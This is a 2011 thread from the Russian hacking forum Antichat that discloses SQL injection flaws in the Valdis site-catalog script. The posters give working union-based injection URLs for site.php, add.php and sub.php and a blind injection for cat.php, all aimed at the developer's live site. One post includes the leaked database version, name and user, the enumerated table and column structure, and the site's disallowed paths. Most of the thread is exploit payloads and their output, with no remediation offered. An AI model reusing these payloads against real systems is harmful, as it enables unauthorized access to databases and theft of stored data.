Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Скрипт каталога сайтов Valdis (https://forum.antichat.xyz/showthread.php?t=251661)

[Dark Green] 06.01.2011 02:14
Сайт разработчика: http://valdis.org.ru Исходников нет, ибо скрипт платный и в паблике его нет. его вообще нигде нет, кроме как у автора, я не нашел во всяком случае =\

SQL inj в site.php?id=

Код:
http://valdis.org.ru/site.php?id=2758+and+1=0+union+select+version(),2,3,4,5,6,7,8,database(),user(),11,12,13,14,15,16,17--
5.0.81-community

valdis_valdis

valdis_valdis@localhost

Структура БД:

Код:
table_name ; column_name

stat_valdis ; id,  ip,  date, page, ref, user
catid ; catid, catname, catstatus, cattitle
link ;  link_id,  link_project_id, link_category_id, link_manufacter_id, link_name,  link_len, link_status
site ; siteid, sitesubid, sitedomain, sitestatus, sitetitle, sitename, siteurl, sitedescription, sitekeywords, siterecip, siteaddemail, siteadddate, sitelastdate, sitehost
Запрещено к индексированию:

Код:
/gotosite.php
/google
/goget
/context.php
/gosite.php
/img.php
/contact.php
/xap.php
/alfa.php
/partner.php
/add1.php
/sape.php
/sot.php
/hosting.php
/test
/article
/sotmarket.php
/jamba
/image.php
/shop.php?magaz=otziv_add
/shop.php?magaz=otziv_view
/shop.php?magaz=topic

Unknown 06.01.2011 17:43
SQL injection:

/add.php

Пример:

Код:
http://valdis.org.ru/add.php?id=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7--
Blind SQL injection:

/cat.php

Пример:

Код:
http://valdis.org.ru/cat.php?id=7%20and%20substring(@@version,1,1)=5
SQL injection:

/sub.php

Пример:

Код:
http://valdis.org.ru/sub.php?id=-54%20union%20select%201,2,concat_ws(0x3a,user(),database(),version()),4,5,6--


Время: 08:39